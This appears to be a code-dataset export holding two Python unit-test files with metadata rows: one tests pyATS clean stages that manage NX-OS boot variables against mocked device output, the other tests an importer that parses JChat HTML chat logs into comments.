from genie.libs.clean.stages.tests.utils import CommonStageTests, create_test_device
from pyats.aetest.steps import Steps
from pyats.results import Passed, Failed
from pyats.aetest.signals import TerminateStepSignal
# Disable logging. It may be useful to comment this out when developing tests.
logging.disable(logging.CRITICAL)
class DeleteBootVariable(unittest.TestCase):
def setUp(self):
# Instantiate class object
self.cls = ChangeBootVariable()
# Instantiate device object. This also sets up commonly needed
# attributes and Mock objects associated with the device.
self.device = create_test_device('PE1', os='nxos')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute_delete_boot_variable api to be mocked so that
# it simulates pass case.
self.device.api.execute_delete_boot_variable = Mock()
# Call the method to be tested (clean step inside class)
self.cls.delete_boot_variable(
steps=steps, device=self.device
)
# Check that the result is expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_delete_boot_variables(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute_delete_boot_variable api to raise an exception when called.
# This simulates the fail case.
self.device.api.execute_delete_boot_variable = Mock(side_effect=Exception)
# We expect this step to fail so make sure it raises the signal
with self.assertRaises(TerminateStepSignal):
self.cls.delete_boot_variable(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class ConfigureBootVariable(unittest.TestCase):
def setUp(self):
self.cls = ChangeBootVariable()
self.device = create_test_device('PE1', os='nxos')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
images = {
'kickstart': 'bootflash:///n3000-uk9-kickstart.6.0.2.U6.10.bin',
'system': 'bootflash:///n3000-uk10.225.0.2.U6.10.bin',
}
# And we want the execute_change_boot_variable api to be mocked.
# This simulates the pass case.
self.device.api.execute_change_boot_variable = Mock()
# Call the method to be tested (clean step inside class)
self.cls.configure_boot_variable(
steps=steps, device=self.device, images=images
)
# Check the overall result is as expected
self.assertEqual(Passed, steps.details[0].result)
def test_pass_current_running_image(self):
data = {
'show version': '''
Cisco Nexus Operating System (NX-OS) Software
TAC support: http://www.cisco.com/tac
Documents: http://www.cisco.com/en/US/products/ps9372/tsd_products_support_series_home.html
Copyright (c) 2002-2017, Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained herein are owned by
other third parties and are used and distributed under license.
Some parts of this software are covered under the GNU Public
License. A copy of the license is available at
http://www.gnu.org/licenses/gpl.html.
Software
BIOS: version 1.4.0
loader: version N/A
kickstart: version 6.0(2)U6(10)
system: version 6.0(2)U6(10)
Power Sequencer Firmware:
Module 1: version v4.4
BIOS compile time: 12/09/2013
kickstart image file is: bootflash:///n3000-uk9-kickstart.6.0.2.U6.10.bin
kickstart compile time: 3/30/2017 9:00:00 [03/30/2017 19:37:34]
system image file is: bootflash:///n3000-uk10.225.0.2.U6.10.bin
system compile time: 3/30/2017 9:00:00 [03/30/2017 20:04:06]
Hardware
cisco Nexus 3048 Chassis ("48x1GE + 4x10G Supervisor")
Intel(R) Celeron(R) CPU P4505 @ 1.87GHz with 3665288 kB of memory.
Processor Board ID FOC19243WQN
Device name: n3k
bootflash: 2007040 kB
Kernel uptime is 796 day(s), 15 hour(s), 58 minute(s), 29 second(s)
Last reset at 2131 usecs after Thu Jan 18 21:17:51 2018
Reason: Disruptive upgrade
System version: 6.0(2)U6(5b)
Service:
plugin
Core Plugin, Ethernet Plugin
'''
}
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute and execute_change_boot_variable api to be mocked.
# This simulates the pass case.
self.device.execute = Mock(side_effect=lambda x: data[x])
self.device.api.execute_change_boot_variable = Mock()
# Call the method to be tested (clean step inside class)
self.cls.configure_boot_variable(
steps=steps, device=self.device, images=None, current_running_image=True
)
# Check the overall result is as expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_retrieve_current_running_image(self):
data = {
'show version': '''
Cisco Nexus Operating System (NX-OS) Software
TAC support: http://www.cisco.com/tac
Documents: http://www.cisco.com/en/US/products/ps9372/tsd_products_support_series_home.html
Copyright (c) 2002-2017, Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained herein are owned by
other third parties and are used and distributed under license.
Some parts of this software are covered under the GNU Public
License. A copy of the license is available at
http://www.gnu.org/licenses/gpl.html.
Software
BIOS: version 1.4.0
loader: version N/A
kickstart: version 6.0(2)U6(10)
system: version 6.0(2)U6(10)
Power Sequencer Firmware:
Module 1: version v4.4
BIOS compile time: 12/09/2013
kickstart image file is: bootflash:///n3000-uk9-kickstart.6.0.2.U6.10.bin
kickstart compile time: 3/30/2017 9:00:00 [03/30/2017 19:37:34]
system image file is: bootflash:///n3000-uk10.225.0.2.U6.10.bin
system compile time: 3/30/2017 9:00:00 [03/30/2017 20:04:06]
Hardware
cisco Nexus 3048 Chassis ("48x1GE + 4x10G Supervisor")
Intel(R) Celeron(R) CPU P4505 @ 1.87GHz with 3665288 kB of memory.
Processor Board ID FOC19243WQN
Device name: n3k
bootflash: 2007040 kB
Kernel uptime is 796 day(s), 15 hour(s), 58 minute(s), 29 second(s)
Last reset at 2131 usecs after Thu Jan 18 21:17:51 2018
Reason: Disruptive upgrade
System version: 6.0(2)U6(5b)
Service:
plugin
Core Plugin, Ethernet Plugin
'''
}
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute and execute_change_boot_variable api to be mocked.
# This simulates the fail case.
self.device.execute = Mock(side_effect=lambda x: data[x])
self.device.api.execute_change_boot_variable = Mock(side_effect=Exception)
# Call the method to be tested (clean step inside class)
with self.assertRaises(TerminateStepSignal):
self.cls.configure_boot_variable(
steps=steps, device=self.device, images=None, current_running_image=True
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
def test_fail_to_configure_boot_variable(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
images = {
'kickstart': 'bootflash:///n3000-uk9-kickstart.6.0.2.U6.10.bin',
'system': 'bootflash:///n3000-uk10.225.0.2.U6.10.bin',
}
# And we want the execute_change_boot_variable api to raise an exception when called.
# This simulates the fail case.
self.device.api.execute_change_boot_variable = Mock(side_effect=Exception)
# Call the method to be tested (clean step inside class)
with self.assertRaises(TerminateStepSignal):
self.cls.configure_boot_variable(
steps=steps, device=self.device, images=images
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class SaveRunningConfig(unittest.TestCase):
def setUp(self):
self.cls = ChangeBootVariable()
self.device = create_test_device('PE1', os='nxos')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute_copy_run_to_start api to be mocked.
# This simulates the pass case.
self.device.api.execute_copy_run_to_start = Mock()
# Call the method to be tested (clean step inside class)
self.cls.save_running_config(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_save_running_config(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute_copy_run_to_start api to raise an exception when called.
# This simulates the fail case.
self.device.api.execute_copy_run_to_start = Mock(side_effect=Exception)
# Call the method to be tested (clean step inside class)
with self.assertRaises(TerminateStepSignal):
self.cls.save_running_config(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class VerifyBootVariable(unittest.TestCase):
def setUp(self):
self.cls = ChangeBootVariable()
self.device = create_test_device('PE1', os='nxos')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
images = {
'kickstart': ['slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin'],
'system': ['slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin']
}
data = {
'show boot': '''
Current Boot Variables:
sup-1
kickstart variable = slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin
system variable = slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin
Boot POAP Disabled
sup-2
kickstart variable = slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin
system variable = slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin
Boot POAP Disabled
No module boot variable set
Boot Variables on next reload:
sup-1
kickstart variable = slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin
system variable = slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin
Boot POAP Disabled
sup-2
kickstart variable = slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin
system variable = slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin
Boot POAP Disabled
No module boot variable set
'''
}
steps = Steps()
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(side_effect=lambda x: data[x])
# Call the method to be tested (clean step inside class)
self.cls.verify_boot_variable(
steps=steps, device=self.device, images=images
)
# Check the overall result is as expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_verify_boot_variable(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
images = {
'kickstart': ['slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin'],
'system': ['slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin']
}
# And we want the execute method to be mocked with device console output.
self.device.api.is_next_reload_boot_variable_as_expected = Mock(side_effect=Exception)
# Call the method to be tested (clean step inside class)
with self.assertRaises(TerminateStepSignal):
self.cls.verify_boot_variable(
steps=steps, device=self.device, images=images
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class VerifyHaFileTransfer(unittest.TestCase):
def setUp(self):
self.cls = ChangeBootVariable()
self.device = create_test_device('PE1', os='nxos')
self.device.is_ha = True
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(return_value='No file currently being auto-copied')
# Call the method to be tested (clean step inside class)
self.cls.verify_ha_file_transfer(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_verify_ha_file_transfer(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
max_time=0
check_interval=0
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(return_value='Auto-Copy on standby is not yet completed')
# Call the method to be tested (clean step inside class)
with self.assertRaises(TerminateStepSignal):
self.cls.verify_ha_file_transfer(
steps=steps, device=self.device, standby_copy_max_time=max_time,
standby_copy_check_interval=check_interval
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
| 38.503722
| 107
| 0.612232
| 1,998
| 15,517
| 4.66967
| 0.153654
| 0.034298
| 0.016077
| 0.018006
| 0.893462
| 0.885316
| 0.877814
| 0.877385
| 0.875991
| 0.870418
| 0
| 0.056774
| 0.306438
| 15,517
| 402
| 108
| 38.599502
| 0.810165
| 0.211574
| 0
| 0.772727
| 0
| 0.099174
| 0.462088
| 0.071634
| 0
| 0
| 0
| 0
| 0.07438
| 1
| 0.070248
| false
| 0.053719
| 0.033058
| 0
| 0.123967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
97832efe7b0fee4fd8933fb98d2180c0c04aec7c
| 28,178
|
py
|
Python
|
tests/test_load_jchat.py
|
debrief/pepys-import
|
12d29c0e0f69e1119400334983947893e7679b6b
|
[
"Apache-2.0"
] | 4
|
2021-05-14T08:22:47.000Z
|
2022-02-04T19:48:25.000Z
|
tests/test_load_jchat.py
|
debrief/pepys-import
|
12d29c0e0f69e1119400334983947893e7679b6b
|
[
"Apache-2.0"
] | 1,083
|
2019-11-06T17:01:07.000Z
|
2022-03-25T10:26:51.000Z
|
tests/test_load_jchat.py
|
debrief/pepys-import
|
12d29c0e0f69e1119400334983947893e7679b6b
|
[
"Apache-2.0"
] | 4
|
2019-11-06T12:00:45.000Z
|
2021-06-09T04:18:28.000Z
|
import os
import unicodedata
import unittest
from datetime import datetime
from importers.jchat_importer import JChatImporter
from pepys_import.core.store.data_store import DataStore
from pepys_import.file.file_processor import FileProcessor
from tests.utils import check_errors_for_file_contents
FILE_PATH = os.path.dirname(__file__)
NO_EXT_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/jchat_no_ext")
BREAKS_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/jchat_breaks_in_message.html")
DATA_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/jchat_sample.html")
UNUSUAL_CHARS_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/jchat_unusual_chars.html")
MARKER_MESSAGES_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/marker_messages.html")
ROOM_MESSAGES_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/connect_disconnect.html")
NO_HTML_EXT_DOT_IN_NAME_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/ABC_123.01_XYZ")
YEAR_MONTH_ROLLOVER_PATH = os.path.join(
FILE_PATH, "jchat_importer_date_sensitive_files/year_month_rollover.html"
)
MODERN_FORMAT_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/jchat_modern_format.html")
LEGACY_NO_I_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/legacy_no_i.html")
COMBINED_FILE_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/combined_format.html")
class JChatTests(unittest.TestCase):
def setUp(self):
self.store = DataStore("", "", "", 0, ":memory:", db_type="sqlite")
self.store.initialise()
def tearDown(self):
pass
def test_no_file_suffix(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(NO_EXT_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 5
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 2
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].content == "COMMS TEST"
def test_breaks_in_message(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(BREAKS_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 3
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 2
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo"
assert results[2].content == "Replay multiple bravos in same tag"
def test_existing_quad_with_new_quads(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(DATA_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 5
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 3
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo"
assert results[2].content == "Replay bravo"
assert results[3].content == "Replay bravo - next day"
assert results[4].content == "Replay bravo - next month"
def test_html_character_representation(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(UNUSUAL_CHARS_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 3
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 3
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert unicodedata.normalize("NFKC", results[0].content) == "COMMS ’TEST"
assert unicodedata.normalize("NFKC", results[1].content) == "Replay&‘ ...bravo"
assert unicodedata.normalize("NFKC", results[2].content) == "Replay–bravo"
def test_room_connections_disconnections_ignored(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(ROOM_MESSAGES_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 2
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 1
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo"
def test_modern_jchat_format(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(MODERN_FORMAT_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 3
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 2
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert len(results) == 3
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo - no i tag and breaks"
assert results[2].content == "Replay bravo - no i tag"
def test_legacy_jchat_format_without_i_tag(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(LEGACY_NO_I_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 2
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 1
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert len(results) == 2
assert results[0].content == "COMMS TEST"
assert results[1].content == "COMMS TEST - no i"
def test_marker_messages_ignored(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(MARKER_MESSAGES_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 2
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 1
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert len(results) == 2
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo"
def test_filename_with_dot_in_name_no_html_ext(self):
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(NO_HTML_EXT_DOT_IN_NAME_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 3
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 2
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].content == "COMMS TEST"
assert results[1].content == "Replay bravo"
assert results[2].content == "Replay bravo"
def test_year_month_rollover(self):
processor = FileProcessor(archive=False)
importer = JChatImporter()
processor.register_importer(importer)
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# Fixed Year/month to avoid flaky tests
importer.year = 2020
importer.month = 10
# parse the data
processor.process(YEAR_MONTH_ROLLOVER_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 6
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 3
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert results[0].time == datetime(2020, 10, 31, 8, 27, 44)
assert results[1].time == datetime(2020, 11, 1, 8, 29, 44)
assert results[2].time == datetime(2020, 11, 30, 9, 14, 44)
assert results[3].time == datetime(2020, 12, 1, 10, 28, 54)
assert results[4].time == datetime(2020, 12, 31, 1, 8, 9)
assert results[5].time == datetime(2021, 1, 1, 2, 8, 9)
def test_combined_format(self):
"""Testing a file with elements of both styles to help develop a more generic approach"""
processor = FileProcessor(archive=False)
processor.register_importer(JChatImporter())
# check states empty
with self.store.session_scope():
# there must be no states at the beginning
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 0
# there must be no platforms at the beginning
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 0
# there must be no datafiles at the beginning
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 0
# parse the data
processor.process(COMBINED_FILE_PATH, self.store, False)
# check data got created
with self.store.session_scope():
# there must be states after the import
comments = self.store.session.query(self.store.db_classes.Comment).all()
assert len(comments) == 7
# there must be platforms after the import
platforms = self.store.session.query(self.store.db_classes.Platform).all()
assert len(platforms) == 5
# there must be one datafile afterwards
datafiles = self.store.session.query(self.store.db_classes.Datafile).all()
assert len(datafiles) == 1
results = (
self.store.session.query(self.store.db_classes.Comment)
.order_by(self.store.db_classes.Comment.time)
.all()
)
assert len(results) == 7
assert results[0].content == "Modern - has i tag"
assert results[1].content == "Modern - no i tag but has multiple breaks"
assert results[2].content == "Modern - no i tag - no breaks"
assert results[3].content == "Legacy - font a swap - no i tag - no breaks"
assert results[4].content == "Legacy - font a swap - has i tag - no breaks"
assert results[5].content == "Modern 2 - no i tag but has multiple breaks"
assert results[6].content == "Modern 2 - no i tag - no breaks"
def test_invalid_missing_timestamp(self):
html_string = """<html>
<head>
<style type="text/css">
<!--
span.msgcontent { color: #0 }
-->
</style>
</head>
<body>
<div id="34544=34534">
<b><a href=""><font>DAUN_AS</font></a></b>
<span class="msgcontent"><font><i>COMMS<br>TEST</i></font></span>
</div>
<body>
<html>"""
importer = JChatImporter()
check_errors_for_file_contents(
html_string,
"Unable to read message 34544=34534. Not enough parts (expecting timestamp, platform, message)",
importer,
"no_timestamp.html",
)
def test_invalid_invalid_timestamp(self):
html_string = """<html>
<head>
<style type="text/css">
<!--
span.msgcontent { color: #0 }
-->
</style>
</head>
<body>
<div id="34544=34534">
<tt><font>[2209744A]</font></tt>
<b><a href=""><font>DAUN_AS</font></a></b>
<span class="msgcontent"><font><i>COMMS<br>TEST</i></font></span>
</div>
<body>
<html>"""
importer = JChatImporter()
check_errors_for_file_contents(
html_string,
"Invalid JChat timestamp 2209744A at 34544=34534",
importer,
"invalid_timestamp.html",
)
def test_invalid_missing_platform(self):
html_string = """<html>
<head>
<style type="text/css">
<!--
span.msgcontent { color: #0 }
-->
</style>
</head>
<body>
<div id="34544=34534">
<tt><font>[22092744A]</font></tt>
<span class="msgcontent"><font><i>COMMS<br>TEST</i></font></span>
</div>
<body>
<html>"""
importer = JChatImporter()
check_errors_for_file_contents(
html_string,
"Unable to read message 34544=34534. Not enough parts (expecting timestamp, platform, message)",
importer,
"no_platform.html",
)
def test_invalid_missing_message(self):
html_string = """<html>
<head>
<style type="text/css">
<!--
span.msgcontent { color: #0 }
-->
</style>
</head>
<body>
<div id="34544=34534">
<tt><font>[22092744A]</font></tt>
<b><a href=""><font>DAUN_AS</font></a></b>
</div>
<body>
<html>"""
importer = JChatImporter()
check_errors_for_file_contents(
html_string,
"Unable to read message 34544=34534. Not enough parts (expecting timestamp, platform, message)",
importer,
"no_message",
)
def test_empty_message(self):
html_string = """<html>
<head>
<style type="text/css">
<!--
span.msgcontent { color: #0 }
-->
</style>
</head>
<body>
<div id="34544=34534">
<tt><font>[22092744A]</font></tt>
<b><a href=""><font>DAUN_AS</font></a></b>
<span class="msgcontent"><font></font></span>
</div>
<body>
<html>"""
importer = JChatImporter()
check_errors_for_file_contents(
html_string,
"Unable to read message 34544=34534. Not enough parts (expecting timestamp, platform, message)",
importer,
"no_message",
)
@staticmethod
def test_simplify_html_no_html():
simple_string = "A simple string with no tags"
result = JChatImporter.simplify_jchat_html(simple_string)
assert result == simple_string
@staticmethod
def test_simplify_html_no_banned_tags():
html_string = "<html><head>Test</head><body>A simple string with no tags</body></html>"
result = JChatImporter.simplify_jchat_html(html_string)
assert result == html_string
@staticmethod
def test_simplify_html_banned_tags():
html_string = """
<html>
<head> Header </head>
<body>
<div id="34544=34534">
<tt><font>[22092744A]</font></tt>
<b><a href=""><font>DAUN_AS</font></a></b>
<span class="msgcontent"><font><i>COMMS<br>TEST</i></font></span>
</div>
<body>
<html>"""
expected = """
<html>
<head> Header </head>
<body>
<div id="34544=34534">
<tt><font>[22092744A]</font></tt>
<b><a href=""><font>DAUN_AS</font></a></b>
<font>COMMS TEST</font>
</div>
<body>
<html>"""
result = JChatImporter.simplify_jchat_html(html_string)
assert result == expected
| 40.896952
| 108
| 0.58968
| 3,273
| 28,178
| 4.961503
| 0.065383
| 0.110844
| 0.097543
| 0.097543
| 0.887247
| 0.862738
| 0.838722
| 0.833303
| 0.833303
| 0.828499
| 0
| 0.018945
| 0.305025
| 28,178
| 688
| 109
| 40.956395
| 0.810244
| 0.122613
| 0
| 0.751046
| 0
| 0.01046
| 0.193761
| 0.050288
| 0
| 0
| 0
| 0
| 0.230126
| 1
| 0.043933
| false
| 0.002092
| 0.075314
| 0
| 0.121339
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
